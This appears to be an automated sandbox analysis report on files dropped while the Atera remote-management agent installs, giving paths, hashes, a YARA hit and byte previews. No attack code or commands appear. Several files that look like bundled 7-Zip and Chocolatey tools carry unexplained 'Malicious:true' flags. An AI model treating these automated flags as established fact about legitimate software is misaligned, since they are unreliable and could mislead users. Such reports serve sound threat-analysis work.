                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1167872
                                                                                                                                                                                                                                        Entropy (8bit):6.603432444128302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Gxb5vMX35l5UVrIdhcMEKWnttf7eePboHvVxSfOtl:GxbSz5UVrIdhnW1Pc96Otl
                                                                                                                                                                                                                                        MD5:0DCE103B0102ADEC3279797665B7A4AE
                                                                                                                                                                                                                                        SHA1:C121392BAB6DBA8D04BEE89C6B526E8E67650CC8
                                                                                                                                                                                                                                        SHA-256:3DB62076E5FCC897FF29DA47FE4029900A4AD696B395B6FA96ACFF1229444C1D
                                                                                                                                                                                                                                        SHA-512:20F0F02097694579AC8794D56411FBE2D97C47D37794CB52AFDABC9956C0452E8A3BB273ED34E463F31927E29E7E41C0FDDB82FBBE688DD39C4113C00EC91BC9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(x.(x.(x.Gg.+x..d.!x.Gg.,x.Gg.*x..p..)x.(x.@x..p../x..^..x..^.*x.3.z..x....-x..~.)x..X.)x.Rich(x.........PE..L...`u.a...........!.........~.......>....................................................@.............................y.......d........{......................P.......................................................D............................text............................... ..`.rdata..............................@..@.data...............................@....sxdata......p......................@....rsrc....{.......|..................@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dll.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513
                                                                                                                                                                                                                                        Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                        MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                        SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                        SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                        SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331776
                                                                                                                                                                                                                                        Entropy (8bit):6.512244761259412
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:J5lqo52kDzMYDJSi7+Ni2ER9Vh98+1PrEVhkQf0huIDaLOjm:JMqzBDJkk2ERvT8MPAf/O6
                                                                                                                                                                                                                                        MD5:7187AE605F4DCE14BB23EA2623956335
                                                                                                                                                                                                                                        SHA1:F7C1DF33B875C98F41DCDE24117D89D42D25B7CE
                                                                                                                                                                                                                                        SHA-256:9E2631C19B243C28B0980607CED2540E9447B1166572483475547C1A9DD4AC0E
                                                                                                                                                                                                                                        SHA-512:F64522E2FB6BB61884FE53C34E79B355EFB9EC33C02B2CD67D729AF7D763E7B3873A5C7CE6AC7BB4567E6BCF8C70CADBC66F511E8BB151AB05096A832032BC8F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L...`u.a.....................<......<.............@..........................p............@.....................................x.... .......................0...2......................................................(............................text...r........................... ..`.rdata..b...........................@..@.data....'..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...<...0...>..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exe.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513
                                                                                                                                                                                                                                        Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                        MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                        SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                        SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                        SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1927
                                                                                                                                                                                                                                        Entropy (8bit):4.78095675693374
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:aCpXZHRo7dL53iEu+byAHsv7g6z0zBZfNP3VyFA:dlq7XTu+xCz0NxxVwA
                                                                                                                                                                                                                                        MD5:899A48828B85C4B0402EE7CF1F65B62B
                                                                                                                                                                                                                                        SHA1:73BA604E5A4E4EA6FB4AD23B8ADF3982B2C82D10
                                                                                                                                                                                                                                        SHA-256:20343526E04CE61EED2675282462E7080D305246F7807386621149C2025765D9
                                                                                                                                                                                                                                        SHA-512:EFD02998961261FFA64332EA13876906D55A8BD8209BF94F922D97889DDF1181129B6A08E5747F1C0A07E69CFC3A05E86D18AFC3E06325B51598F52360881B1B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview: 7-Zip.. ~~~~~.. License for use and distribution.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.... 7-Zip Copyright (C) 1999-2016 Igor Pavlov..... Licenses for files are:.... 1) 7z.dll: GNU LGPL + unRAR restriction.. 2) All other files: GNU LGPL.... The GNU LGPL + unRAR restriction means that you must follow both .. GNU LGPL rules and unRAR restriction rules....... Note: .. You can use 7-Zip on any computer, including a computer in a commercial .. organization. You don't need to register or pay for 7-Zip....... GNU LGPL information.. --------------------.... This library is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This library is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABI

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29184
                                                                                                                                                                                                                                        Entropy (8bit):5.423222213276874
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:02aUriLtuRZFwdpyTmNSHSBLVogO6QlRSO/:1r0ARZF6NFVogjQlRv/
                                                                                                                                                                                                                                        MD5:5CA71CBFF5A8DE7E5E30B6E94CD42069
                                                                                                                                                                                                                                        SHA1:991701A32492D743430627CBFBD56D6884C32588
                                                                                                                                                                                                                                        SHA-256:23FBD1EE66FCE6872E97B2FE84C409AB30A74FE8720B722BC6F8BAE6E7764C04
                                                                                                                                                                                                                                        SHA-512:77E31EC0DCA4E4895D3A4C0E84C6C1516D94089763F1735CAC150EFCD4EEC36107BB810E24D94C1208B7A80881D858DBFE887B32DA6F6D8F0C48F21C2525D0BE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......X.................f..........n.... ........@.. ....................................@................................. ...K.................................................................................... ............... ..H............text...te... ...f.................. ..`.rsrc................h..............@..@.reloc...............p..............@..B................P.......H.......8<...H......u...........P ......................................h.Mk_F!..D........%..............O...T.....7..u#..[h..T]..^....u.2yC.n........}..?)K.?!@.....3k+.....{.u.@.!q....|....$..f.s!...}.....(".....}....*:.{......o....*2.{....o....*2.{....o....*2.{....o#...*2.{....o$...*..*6.{.....o%...*6.{.....o&...*:.{......o'...*6.{.....o(...*F.{....o)........*F.{....o)........*6.{.....o....*6.{.....o....*6.{.....o....*:.{......o....*6.{.....o....*6.{.....o....*..*"..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):150
                                                                                                                                                                                                                                        Entropy (8bit):4.731888600769331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:vFWWMNHU8LdgCQcIMOofoObWNRXGws8FLu+gNlFueRObK4QIMOn:TMVBd1IGPKNxgUaNNu5W4QIT
                                                                                                                                                                                                                                        MD5:E9AD5DD7B32C44F8A241DE0E883D7733
                                                                                                                                                                                                                                        SHA1:034C69B120C514AD9ED83C7BAD32624560E4B464
                                                                                                                                                                                                                                        SHA-256:9B250C32CBEC90D2A61CB90055AC825D7A5F9A5923209CFD0625FCA09A908D0A
                                                                                                                                                                                                                                        SHA-512:BF5A6C477DC5DFEB85CA82D2AED72BD72ED990BEDCAF477AF0E8CAD9CDF3CFBEBDDC19FA69A054A65BC1AE55AAF8819ABCD9624A18A03310A20C80C116C99CC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <enforceFIPSPolicy enabled="false"/>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95
                                                                                                                                                                                                                                        Entropy (8bit):4.721635609555772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:SZdFVJMXLreqXy1Wfardzl7BZyOX35++n:Sls/t+WfKj+OXV
                                                                                                                                                                                                                                        MD5:A10B78183254DA1214DD51A5ACE74BC0
                                                                                                                                                                                                                                        SHA1:5C9206F667D319E54DE8C9743A211D0E202F5311
                                                                                                                                                                                                                                        SHA-256:29472B6BE2F4E7134F09CC2FADF088CB87089853B383CA4AF29C19CC8DFC1A62
                                                                                                                                                                                                                                        SHA-512:CAE9F800DA290386DE37BB779909561B4EA4CC5042809E85236D029D9125B3A30F6981BC6B3C80B998F727C48EB322A8AD7F3B5FB36EA3F8C8DD717D4E8BE55E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:CheckSum is licensed as Apache v2 - https://raw.github.com/ferventcoder/checksum/master/LICENSE

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):565672
                                                                                                                                                                                                                                        Entropy (8bit):5.0581002983018335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hjgGwLGK4Uk0Ycoi6DdP51S2XI5cgGlKFTvr5pgx1v9/oLUmP9nVy:h7wj4kYcopdPm2ac8+1vVmPHy
                                                                                                                                                                                                                                        MD5:F7B6AA803BE23C3192FCC2058D208F44
                                                                                                                                                                                                                                        SHA1:A9569D1A4948FD33D388BB263B5CFF0D66E3BB34
                                                                                                                                                                                                                                        SHA-256:D489923F1F91954B8AA15CD0E763132B9033780481D850D74395F5AB6E266C7C
                                                                                                                                                                                                                                        SHA-512:7FD6E1B291503AC9A67128BAC2D6C8F21B40CE9DE99E015866FC62C79CBBAFCD25F3F43A0EB77A00B20C1D6BE9504E85458D503647BF2CF93BC71DAFB64AF122
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$./b.................x............... ........@.. ....................................@.................................(...W.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................d.......H.......LX...=......8........@..........................................z.(......}.....(/...o0...}....*..*...0..)........{......E............?...Z...|....................*..}..... .>-.}......}.....*..}......{.... Z...a}......}.....*..}..... ?w*.}......}.....*..}......{.... Z...a}......}.....*..}..... H...}......}.....*..}......{.... ...a}......}.....*..}..... L...}......}.....*..}..... ...F}......}.....*..}.....*.....{....*.s1...z.2.{.....i...*....0..<........{......3..{....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3758
                                                                                                                                                                                                                                        Entropy (8bit):4.882012677800436
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:wwVl/ldfbBaq9k4KM8da2J7LbyM71wKPC/:rVl/ldfsn4KM8daU7LP5wn/
                                                                                                                                                                                                                                        MD5:89AC7C94D1013F7B3E32215A3DB41731
                                                                                                                                                                                                                                        SHA1:1511376E8A74A28D15BB62A75713754E650C8A8D
                                                                                                                                                                                                                                        SHA-256:D4D2EF2C520EC3E4ECFF52C867EBD28E357900E0328BB4173CB46996DED353F4
                                                                                                                                                                                                                                        SHA-512:9BA2B0029E84DE81FFEF19B4B17A6D29EE652049BB3152372F504A06121A944AC1A2B1B57C6B0447979D5DE9A931186FEF9BD0667D5358D3C9CB29B817533792
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Shim Generator - shimgen.exe..Copyright (C) 2017 - Present Chocolatey Software, Inc ("CHOCOLATEY")..Copyright (C) 2013 - 2017 RealDimensions Software, LLC ("RDS")..===================================================================..Grant of License..===================================================================..ATTENTION: Shim Generator ("shimgen.exe") is a closed source application with..a proprietary license and its use is strictly limited to the terms of this ..license agreement.....RealDimensions Software, LLC ("RDS") grants Chocolatey Software, Inc a revocable, ..non-exclusive license to distribute and use shimgen.exe with the official ..Chocolatey client (https://chocolatey.org). This license file must be stored in ..Chocolatey source next to shimgen.exe and distributed with every copy of ..shimgen.exe. The distribution or use of shimgen.exe outside of these terms ..without the express written permission of RDS is strictly prohibited.....While the source for shimgen.exe is

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1185456
                                                                                                                                                                                                                                        Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                        MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                        SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                        SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                        SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....J9rX...........=...AgentPackageRuntimeInstaller/AgentPackageRuntimeInstaller.exe....0........g.........^ ....,/_.U. *t....H......Z.X..x#...?....(/.EH.....r.l#.6.......76.b....u',4%.Y.br....W..VcO..[b/.....(....."I..u..S*....../.x...j.5.<b......n.v0.. z'M.....w.. ..qu.<...w...[...9....F...D..+....o....!..1I...^=H1.{.:=\...#V.]...1..)F.s":$.g.H.p.'^....K.F...3..}.......[J....xD.........._RB...... \=b.<.u 1k.Y....&.X.).`>M9.$H.].>t..^..!....}_.H.....h....uT.q..cJE.M... .QG..+?.gZM...G.9x.T.q..U..... X.s.....{....F.G$..$.A.n..jz]=.qi!U..4.>.e.7"..].O.F..XdciK..d_0..H..7rHd.jj.L.v6.< ........2.8....8.mc_.(!...\u...mY.........tv.e..,'..E......l..s`... s...W.Sx9b..Dnc...!0_..T.y..%r..{..E;....v"ce.K....{...).B....:N.H$..h..F.......Y.8k.....M....~9..X-M....f>~t..*#..R......6M....f....>-b.....W. .S.WO.c".>.....+iR..w~.u...6../..J..^&...K.BcQ.Fy....<.O.......P..y..#5:l.4.......~........g.:W...1.p7...K...n{.9~..c.h......NT.5...w........?_>XJ..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):55344
                                                                                                                                                                                                                                        Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                        MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                        SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                        SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
                                                                                                                                                                                                                                        SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................... ......o7....`.................................X...O.......L...............0(..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........K..|v...........................................................0..........s....(......%.-..( ...+..(!...}\.........s....s......o...+o.....=.r...p(.....(....(.....(....o....r?..p(.....(.......,..o ....*.......4..A.3......4.@t.......0..8.......(!...("...(!...(#...($...(!...o%...($...(!...o&.....&..*........44........('...*..{....*..{....*..{....*..{....*..{....*..('.....}......}.......}.......}......}....*......s....*......s....*......s....*......s....*V.('.....}.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2010
                                                                                                                                                                                                                                        Entropy (8bit):5.013965898836397
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrb7O7Rgdp+1/gYoSagFsg+w3Sg+Cag+XgjdgDt:7rne4wCNj
                                                                                                                                                                                                                                        MD5:0B17B3BE9B3A6F6879998D280941DE55
                                                                                                                                                                                                                                        SHA1:EDE825B51EE11AF7C9221DCE596BB969CD068529
                                                                                                                                                                                                                                        SHA-256:1D69336E421C535CECF2E0326BE39B44EEC8EA39754AC8E855D8E0368E0F4619
                                                                                                                                                                                                                                        SHA-512:06D9CC03B8F7295A6E02376159EA96A83CAED4B584769370C0BF365B25D29C883BA5C8359CFEB7316D13C93B49FD37CCA267F6E7931220CED71435E1F4B639C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.14.0.17971" newVersion="2.14.0.17971" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <d

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                        MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                        SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                        SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                        SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.6

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
